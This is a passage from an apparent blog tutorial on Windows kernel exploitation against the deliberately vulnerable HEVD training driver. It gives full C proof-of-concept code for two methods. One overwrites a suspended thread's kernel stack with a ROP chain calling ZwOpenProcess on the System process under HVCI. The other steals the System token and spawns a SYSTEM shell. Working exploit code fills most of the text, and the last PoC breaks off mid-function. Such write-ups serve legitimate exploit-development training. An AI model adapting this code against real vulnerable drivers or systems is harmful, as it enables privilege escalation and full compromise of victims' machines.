By calling the kernelRead() function, we can retrieve both StackLimit and StackBase values with KTHREAD address and their respective offset.

// Step 3
PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver); // KTHREAD.StackLimit
printf("[+] Dummy thread's StackLimit: %p\n", stackLimit);

PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver); // KTHREAD.StackBase
printf("[+] Dummy thread's StackBase: %p\n", stackBase);

Executed the updated POC and retrieved StackLimit and StackBase address and cross-verified with the KTHREAD structure of the dummy thread.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

With the retrieved address, the total stack size of the thread id 0x6000. We need this for the next step.

0: kd> ? 0xfffff88e`b4126000 - 0xfffff88e`b4120000
Evaluate expression: 24576 = 00000000`00006000

Step 4: Find the return address of nt!KiApcInterrupt

Our goal is to overwrite a specific function’s return address of the dummy thread we created. Using WinDBG’s !thread extension with the KTHREAD address, we can view the call stack. You might notice the function nt!KiApcInterrupt, we will be overwriting this return address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

When a new thread is created it initially runs nt!KiStartUserThread in the kernel-mode, and then calls the system initial thread routine, nt!PspUserThreadStartup, you can see this in the call stack as well. Since we created the thread in suspended state (CREATE_SUSPENDED). It will hold all the execution, including the donothing() function we made.

If you look at the call stack, the nt!KiApcInterrupt+0x2ff (TrapFrame @ fffff88eb4125740)` contains a trap frame, basically it stores the CPU register state allowing to resume execution correctly when the thread is resumed.

So when a thread is resumed, it will return from nt!KiApcInterrupt+0x2ff, so we need to find this (nt!KiApcInterrupt+0x2ff) return address and overwrite with our ROP gadgets.

The return address in my machine is nt!KiApcInterrupt+0x2ff, so we need it’s offset. Because this will be the address stored in the stack. We gonna find this address in the stack.

0: kd> ? nt!KiApcInterrupt+0x2ff - nt
Evaluate expression: 4209647 = 00000000`00403bef

When the thread is resumed (from user-mode using ResumeThread()), the execution will return from nt!KiApcInterrupt+0x2ff which will eventually executes our ROP chain, that’s the goal.

In previous step we got the StackBase and StackLimit and we got the offset of the nt!KiApcInterrupt+0x2ff as well, so basically we gonna find this address in the stack frame.

The following for loop will read every 8 bytes using kernelRead beginning from the stack frame (StackBase) till the end of stack (StackLimit). Also, remember that stack grows downwards, so we need to move towards the lower memory addresses.

 // Step 4
 LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
 printf("[+] Nt base address: %p\n", nt_addr);

 int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit;
 PVOID retAddr = NULL;
 PVOID stackRet = NULL;
 for (int i = 0x8; i < stackSize - 0x8; i += 0x8)
 {
     retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver);

     if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff
     {
         printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i));
         stackRet = PVOID((uintptr_t)stackBase - i);
         break;
     }
 }

Paused the execution using getchar() to analyze it and the above code found nt!KiApcInterrupt+0x2ff in stack at location 0xFFFFF88EB4125738 and confirmed the same in WinDBG. Now that we found the location of the return address we need to overwrite, let’s move to the next step.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5 & 6: Writing ROP gadgets to call ZwOpenProcess & ZwTerminateThread

Similar to kernelRead, I created this kernelWrite function which takes the value to write (data) and the location to write that value (writeAddr) as arguments. And it will call TriggerArbitraryWrite to write that value in the provided address.

PVOID kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {

    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)(&data);
    input.WHERE = (LPVOID)(writeAddr);

    printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);

    NTSTATUS success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return FALSE;
    }
}

The ROP gadget is similar to what I have used previously. It will make a call to ZwOpenProcess to get a full control process handle to system.exe. Then it will terminate the dummy thread by calling ZwTerminateThread, the reason for this call is, we messed the stack of the dummy thread with our ROP gadgets, so after the execution of ZwOpenProcess API, it will try to run the thread normally but it will lead to BSOD. To solve this we can just terminate the thread, since we don’t need it anymore.

  • ZwOpenProcess API requires some structures as parameters but it can be declared in user-mode.
  • ZwTerminateThread API requires the dummy thread handle, since I already stored that in dHandle, I just used it.
  • Created a for loop to write each ROP gadgets in the stack and I stored the location of nt!KiApcInterrupt+0x2ff in stackRet so provided that as first address and moving on it increases the address by 8 bytes to move to next address.
// Step 5

// RCX - ProcessHandle
HANDLE hSystem = NULL;

// R8 - ObjectAttributes
OBJECT_ATTRIBUTES objAttrs = { 0 };
memset(&objAttrs, 0, sizeof(objAttrs));
objAttrs.ObjectName = NULL;
objAttrs.Length = sizeof(objAttrs);

// R9 - ClientId
CLIENT_ID clientId = { 0 };
clientId.UniqueProcess = ULongToHandle(4);
clientId.UniqueThread = NULL;

LPVOID rop[] = {
    (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
    (LPVOID)&hSystem, // Handle
    (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
    (LPVOID)PROCESS_ALL_ACCESS,
    (LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret
    (LPVOID)&objAttrs,
    (LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret
    (LPVOID)&clientId,
    (LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret;
    (LPVOID)(0x4141414141414141), // 0x8
    (LPVOID)(0x4141414141414141), // 0x10
    (LPVOID)(0x4141414141414141), // 0x18
    (LPVOID)(0x4141414141414141), // 0x20
    (LPVOID)(0x4141414141414141), // 0x28
    (LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess
    (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
    (LPVOID)(ULONG64)dHandle, // Thread Handle
    (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
    (LPVOID)(0x0000000000000000),
    (LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6
};

printf("[+] Writing Shellcode to the thread stack...\n");

for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) {
    kernelWrite((rop[i]), stackRet, hDriver);
    stackRet = (LPVOID)((uintptr_t)stackRet + 0x8);
}

Executed the above POC and we can see the nt!KiApcInterrupt+0x2ff return address is overwritten by the ROP gadget and rest of the ROP gadgets are in place.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 7: Resume the Thread

Now that everything is ready, we can resume the thread by calling ResumeThread.

ResumeThread(dHandle);

Sleep(2000);

printf("[+] System process Handle 0x%lx\n", hSystem);

getchar();

Once the thread is resumed, it will look for the nt!KiApcInterrupt+0x2ff return address, since it’s replaced by our ROP gadget, it will start executing that and eventually call ZwOpenProcess to get Full Control handle on system.exe process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

HVCI is one of the powerful mitigation and we didn’t bypassed HVCI, instead we can get around with that by calling Kernel APIs. But we are not able to execute unsigned shellcode. However, we bypassed kCFG by using the dummy thread method but there is Control-flow Enforcement Technology (kCET) which will block the above method if it’s enabled. But it’s not enabled by default, atleast for now.

  • Full POC

    // whatwhere3.cpp : This file contains the 'main' function. Program execution begins and ends there.
    //
    
    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include "header.h"
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
    
    #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    PVOID getbaseaddress(LPCWSTR name)
    {
        BOOL status;
        LPVOID* pImageBase;
        DWORD ImageSize;
        WCHAR driverName[1024];
        LPVOID driverBase = nullptr;
    
        status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    
        pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
        status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    
        int driver_count = ImageSize / sizeof(pImageBase[0]);
    
        for (int i = 0; i < driver_count; i++) {
            GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char));
    
            if (!wcscmp(name, driverName)) {
                driverBase = pImageBase[i];
                break;
            }
        }
    
        return driverBase;
    }
    
    void donothing()
    {
        return;
    }
    
    HANDLE fakethread() {
    
        HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL);
    
        if (!dHandle) {
            printf("[-] Failed creating a suspended thread..\n");
        }
        else {
            printf("[+] Dummy thread Handle: 0x%lx\n", dHandle);
        }
    
        return dHandle;
    }
    
    PVOID findKTHREAD(HANDLE dHandle) {
        pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
            GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    
        if (!NtQuerySystemInformation) {
            printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
            return FALSE;
        }
    
        printf("[+] Found ntdll!NtQuerySystemInformation\n");
    
        ULONG returnLen = 0x1000;
        NTSTATUS status;
    
        PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);
    
        do {
            if (SystemHandleInfo) {
                HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
            }
    
            SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
            if (!SystemHandleInfo) {
                printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
                return FALSE;
            }
    
            status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
        } while (status == STATUS_INFO_LENGTH_MISMATCH);
    
        PVOID dKTHREAD = NULL;
        for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++)
        {
            if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId())
            {
                if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue)
                {
                    dKTHREAD = SystemHandleInfo->Handles[i].Object;
                    printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD);
                    free(SystemHandleInfo);
                    return dKTHREAD;
                }
            }
        }
    }
    
    PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
        LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    
        input.WHAT = (LPVOID)(readAddr);
        input.WHERE = (LPVOID)(storeAddr);
    
        printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
        NTSTATUS success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return FALSE;
        }
    
        LPVOID* data = (LPVOID*)storeAddr;
        return *data;
    }
    
    PVOID kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
        input.WHAT = (LPVOID)(&data);
        input.WHERE = (LPVOID)(writeAddr);
    
        printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
    
        NTSTATUS success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return FALSE;
        }
    }
    
    int main()
    {
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %d", GetLastError());
            return 1;
        }
    
        // Step 1
    
        printf("[+] Creating a dummy thread..\n");
        HANDLE dHandle = fakethread();
        if (!dHandle) {
            return 1;
        }
    
        getchar();
    
        // Step 2
        PVOID dKTHREAD = findKTHREAD(dHandle);
        if (dKTHREAD == NULL) {
            printf("[-] Unable to find KTHREAD of the dummy thread!\n");
            return 1;
        }
    
        getchar();
    
        // Step 3
        PVOID stackLimit = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x30), hDriver);
        printf("[+] Dummy thread's StackLimit: %p\n", stackLimit);
    
        PVOID stackBase = kernelRead(PVOID((uintptr_t)dKTHREAD + 0x38), hDriver);
        printf("[+] Dummy thread's StackBase: %p\n", stackBase);
    
        getchar();
    
        // Step 4
        LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
        printf("[+] Nt base address: %p\n", nt_addr);
    
        int stackSize = (uintptr_t)stackBase - (uintptr_t)stackLimit;
        PVOID retAddr = NULL;
        PVOID stackRet = NULL;
        for (int i = 0x8; i < stackSize - 0x8; i += 0x8)
        {
            retAddr = kernelRead(PVOID((uintptr_t)stackBase - i), hDriver);
    
            if (retAddr == PVOID((uintptr_t)nt_addr + 0x00403bef)) // nt!KiApcInterrupt+0x2ff
            {
                printf("[+] Found nt!KiApcInterrupt+0x2ff in the stack %p\n", PVOID((uintptr_t)stackBase - i));
                stackRet = PVOID((uintptr_t)stackBase - i);
                break;
            }
        }
    
        getchar();
    
        // Step 5
        
        // RCX - ProcessHandle
        HANDLE hSystem = NULL;
    
        // R8 - ObjectAttributes
        OBJECT_ATTRIBUTES objAttrs = { 0 };
        memset(&objAttrs, 0, sizeof(objAttrs));
        objAttrs.ObjectName = NULL;
        objAttrs.Length = sizeof(objAttrs);
    
        // R9 - ClientId
        CLIENT_ID clientId = { 0 };
        clientId.UniqueProcess = ULongToHandle(4);
        clientId.UniqueThread = NULL;
    
        LPVOID rop[] = {
            (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
            (LPVOID)&hSystem, // Handle
            (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
            (LPVOID)PROCESS_ALL_ACCESS,
            (LPVOID)((uintptr_t)nt_addr + 0x00201861), // pop r8; ret
            (LPVOID)&objAttrs,
            (LPVOID)((uintptr_t)nt_addr + 0x00201862), // pop rax; ret
            (LPVOID)&clientId,
            (LPVOID)((uintptr_t)nt_addr + 0x00343f0e), // mov r9, rax; mov rax, r9; add rsp, 0x28; ret;
            (LPVOID)(0x4141414141414141), // 0x8
            (LPVOID)(0x4141414141414141), // 0x10
            (LPVOID)(0x4141414141414141), // 0x18
            (LPVOID)(0x4141414141414141), // 0x20
            (LPVOID)(0x4141414141414141), // 0x28
            (LPVOID)((uintptr_t)nt_addr + 0x003fb260), // nt!ZwOpenProcess
            (LPVOID)((uintptr_t)nt_addr + 0x00202e71), // pop rcx; ret
            (LPVOID)(ULONG64)dHandle, // Thread Handle
            (LPVOID)((uintptr_t)nt_addr + 0x004e13ce), // pop rdx; ret
            (LPVOID)(0x0000000000000000),
            (LPVOID)((uintptr_t)nt_addr + 0x003fb800), // nt!ZwTerminateThread // Step 6
        };
    
        printf("[+] Writing Shellcode to the thread stack...\n");
    
        for (int i = 0; i < sizeof(rop) / sizeof(rop[0]); i++) {
            kernelWrite((rop[i]), stackRet, hDriver);
            stackRet = (LPVOID)((uintptr_t)stackRet + 0x8);
        }
    
        getchar();
    
        // Step 7
    
        ResumeThread(dHandle);
    
        Sleep(2000);
    
        printf("[+] System process Handle 0x%lx\n", hSystem);
    
        getchar();
    
        CloseHandle(dHandle);
        CloseHandle(hDriver);
    
        getchar();
    
        return 0;
    }
    

Method (5) - Token Stealing

The next method is about Token Stealing, which leverages a Write-What-Where vulnerability. In this method, HVCI is enabled. However, this method is easy to perform.

Every process and thread has “Token” which represents the security context of the process or thread, containing information about the user account, group memberships, privileges, and access rights. The below image from Process Hacker is the “Token” of the system process, stealing that would give us the same permission as system.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Before getting into writing the exploit, we need to know some basic things which we need for the POC.

Each process has this Token which is an _EX_FAST_REF union and it can be accessed from EPROCESS structure.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

EPROCESS structure contains a member called ActiveProcessLinks which is a double linked list and it points to the next process’s EPROCESS.ActiveProcessLinks and the UniqueProcessId member is the PID of the specific process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

With the above information, we gonna follow these steps:

  • Step 1: Leak the system’s EPROCESS structure.
  • Step 2: With the EPROCESS structure of system, we gonna get the ActiveProcessLinks member and find our exploit’s EPROCESS structure with the help of UniqueProcessId member.
  • Step 3: Steal the system’s EPROCESS.Token value.
  • Step 4: Retrieve our exploit’s EPROCESS.Token value.
  • Step 5: Overwrite our exploit’s EPROCESS.Token value with system’s Token.

Step 1: Leak system’s EPROCESS structure

To find system’s EPROCESS structure we can use same method as what we did in “Method (4)” with the help of NtQuerySystemInformation(), we can get every handle’s object address and through that we search for the handle of the system process.

Interestingly, System’s first handle is the handle of it’s own process, that makes the work really easy.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Here is the updated code to get the EPROCESS structure of the system process:

  • Like before, we are getting every handle in the machine using NtQuerySystemInformation().
  • Then we get the very first handle (SYSTEM_HANDLE_INFORMATION) and check if the UniqueProcessId (which is the PID) is “4”, because the first handle is always the handle to the system process itself and system’s PID is always 4.
  • If the UniqueProcessId of the first handle is 4, then we get the handle’s Object, this is the EPROCESS address of the system itself.
  • As I showed in the above Process Hacker image, the first handle is always the handle to the process itself. Since the Object is “Process”, the address associated with it is the address of EPROCESS.
PVOID findEPROCESS() {
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return FALSE;
    }

    printf("[+] Found ntdll!NtQuerySystemInformation\n");

    ULONG returnLen = 0x1000;
    NTSTATUS status;

    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);

    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }

        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return FALSE;
        }

        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    PVOID sysEPROCESS = NULL;
    if (SystemHandleInfo->Handles[0].UniqueProcessId == 4) {
        sysEPROCESS = SystemHandleInfo->Handles[0].Object;
        printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS);
        return sysEPROCESS;
    }
    else {
        return sysEPROCESS;
    }
}

int main()
{

[::]

 // Step 1

 PVOID sysEPROCESS = findEPROCESS();
 if (sysEPROCESS == NULL) {
     printf("[-] Unable to find EPROCESS of the system.exe!\n");
     return 1;
 }
 
[::]
 
}

Executed the POC and the retrieved EPROCESS address of the system and it is as same as the “Process” handle’s address.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

This can also be verified using !process command from WinDBG with the retrieved address. We can see the Image as System, so this concludes we got the EPROCESS structure of the system process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 2: Find exploit’s EPROCESS structure

Now that we get the EPROCESS address of the system process, we can begin a loop on the double linked list (ActiveProcessLink) to get the address of next process’s EPROCESS.ActiveProcessLinks address.

  • I copied the offset of the required values from EPROCESS structure and using #define stored those offsets for easy accessible.
  • Begin this by getting the current process ID using GetCurrentProcessId() and stored that in pid.
  • Retrieved the address of first EPROCESS.ActiveProcessLinks and stored that in SysProcHead.
  • Then the while loop begins to find the EPROCESS of the exploit (current) process.
  • I used the same kernelRead function here and it reads the next process’s EPROCESS.ActiveProcessLinks and stored that in nextProc.
  • Then from the nextProc, subtracted the offset of ActiveProcessLinks to get to the beginning of EPROCESS structure of that process. Because ActiveProcessLinks doubled linked list always points to next process’s EPROCESS.ActiveProcessLinks not EPROCESS itself.
  • Then I get the address of UniqueProcessId of that EPROCESS structure and again using kernelRead, read the value and store that to foundpid, so if this is not the same PID of the exploit process, then the loop continues.
#define Offset_ActiveProcessLinks 0x448
#define Offset_UniqueProcessId 0x440
#define Offset_Token 0x4b8

[::]

// Step 2

printf("[+] Attempting to find EPROCESS address of the current process...\n");
DWORD pid = GetCurrentProcessId();
printf("[+] Current Process ID: 0x%lx\n", pid);
PVOID SysProcHead = PVOID((uintptr_t)sysEPROCESS + Offset_ActiveProcessLinks);
DWORD foundpid = 0;
PVOID nextPid = 0;
PVOID nextProc = sysEPROCESS;

while (pid != foundpid) {
    nextProc = kernelRead(PVOID((uintptr_t)nextProc + Offset_ActiveProcessLinks), hDriver);
    nextProc = PVOID((uintptr_t)nextProc - Offset_ActiveProcessLinks);
    nextPid  = PVOID((uintptr_t)nextProc + Offset_UniqueProcessId);
    foundpid = (DWORD)kernelRead(nextPid, hDriver);

    if (SysProcHead == nextProc) {
        printf("[+] Failed to find target's EPROCESS\n");
        return 1;
    }

}

if (nextProc == NULL) {
    printf("[-] Unable to find EPROCESS of current process!\n");
    return 1;
}

PVOID currentEPROCESS = nextProc;
printf("[+] Found EPROCESS address of current process: %p\n", currentEPROCESS);

Executed the POC and as expected, it found the EPROCESS structure of the exploit (whatwhere4.exe).

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: Steal system’s Token

Now we got the EPROCESS address of both system and the exploit, we can read the Token value of the system first. This step is just simply reading that value and store that in sysToken.

// Step 3

PVOID sysToken = kernelRead(PVOID((uintptr_t)sysEPROCESS + Offset_Token), hDriver);
printf("[+] System's EPROCESS.Token value: %p\n", sysToken);

The updated code retrieved the Token value of the system process.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 4: Retrieve exploit’s Token

This step is same as previous step, instead we read the Token value of the exploit (whatwhere4.exe).

// Step 4

PVOID curToken = kernelRead(PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);
printf("[+] Current Process's EPROCESS.Token value: %p\n", curToken);

The reason to get this value instead of directly overwriting the Token is, the _EX_FAST_REF is an union and it contains RefCnt which is the reference count and it should not be disturbed, if it’s wrong it might lead to BSOD.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 5: Replace the Token value

Now we overwrite the system token on the whatwhere4.exe token except the last bit, to avoid any disruption in the reference count. After overwriting the Token value, we launch cmd.exe.

// Step 5
PVOID newToken = (PVOID((uintptr_t)curToken & 0xf));
newToken = (PVOID((uintptr_t)newToken | (uintptr_t)sysToken));
printf("[+] Modified EPROCESS.Token value: %p\n", newToken);

printf("[+] Attempting to overwrite current process's Token to escalate...\n");
BOOL status = kernelWrite(newToken, PVOID((uintptr_t)currentEPROCESS + Offset_Token), hDriver);

if (!status) {
    printf("[-] Failed to overwrite current process's Token value...\n");
    return 1;
}

getchar();

printf("[+] Spawning a shell with elevated privileges\n\n");
system("cmd");

Got system:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Got shell as SYSTEM with HVCI enabled, we didn’t actually bypassed anything here, instead we just stole the Token of the system. But yet it’s really an effective way to get SYSTEM.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Note: Starting from Windows 11 24h2, EnumDeviceDrivers() and NtQuerySystemInformation() require the SeDebugPrivilege to obtain kernel addresses. This means you must be an Administrator in order to use them on the latest Windows 11 version. This might be a trouble.

  • Full POC

    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include "header.h"
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    typedef NTSTATUS(WINAPI* pNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength);
    
    #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
    #define Offset_ActiveProcessLinks 0x448
    #define Offset_UniqueProcessId 0x440
    #define Offset_Token 0x4b8
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
        LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
    
        input.WHAT = (LPVOID)(readAddr);
        input.WHERE = (LPVOID)(storeAddr);
    
        // printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
        NTSTATUS success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        /*
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return FALSE;
        }
        */
        LPVOID* data = (LPVOID*)storeAddr;
        return *data;
    }
    
    BOOL kernelWrite(PVOID data, PVOID writeAddr, HANDLE hDriver) {
    
        WRITE_WHAT_WHERE input;
        input.WHAT = (LPVOID)(&data);
        input.WHERE = (LPVOID)(writeAddr);
    
        // printf("[+] Calling TriggerArbitraryWrite to Write on %p....", writeAddr);
    
        NTSTATUS success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            return TRUE;
        }
        else {
            return FALSE;
        }
    }
    
    PVOID findEPROCESS() {
        pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
            GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");
    
        if (!NtQuerySystemInformation) {
            printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
            return FALSE;
        }
    
        printf("[+] Found ntdll!NtQuerySystemInformation\n");
    
        ULONG returnLen = 0x1000;
        NTSTATUS status;
    
        PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);
    
        do {
            if (SystemHandleInfo) {
                HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
            }
    
            SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
            if (!SystemHandleInfo) {
                printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
                return FALSE;
            }
    
            status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
        } while (status == STATUS_INFO_LENGTH_MISMATCH);
    
        PVOID sysEPROCESS = NULL;
        if (SystemHandleInfo->Handles[0].UniqueProcessId == 4) {
            sysEPROCESS = SystemHandleInfo->Handles[0].Object;
            printf("[+] Found EPROCESS of the system %p\n", sysEPROCESS);
            return sysEPROCESS;
        }
        else {
            return sysEPROCESS;
        }
    }
    
    int main()
    {
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %d", GetLastError());
            return 1;
        }
    
        // Step 1
    
        PVOID sysEPROCESS = findEPROCESS();
        if (sysEPROCESS == NULL) {
            printf("[-] Unable to find EPROCESS of the system.exe!\n");
            return 1;
        }
    
        getchar();
    
        // Step 2
    
        printf("[+] Attempting to find EPROCESS address of the current process...\n");
        DWORD pid = GetCurrentProcessId();
        printf("[+] Current Process ID: 0x%lx\n", pid);
        PVOID SysProcHead = PVOID((uintptr_t)sysEPROCESS + Offset_ActiveProcessLinks);
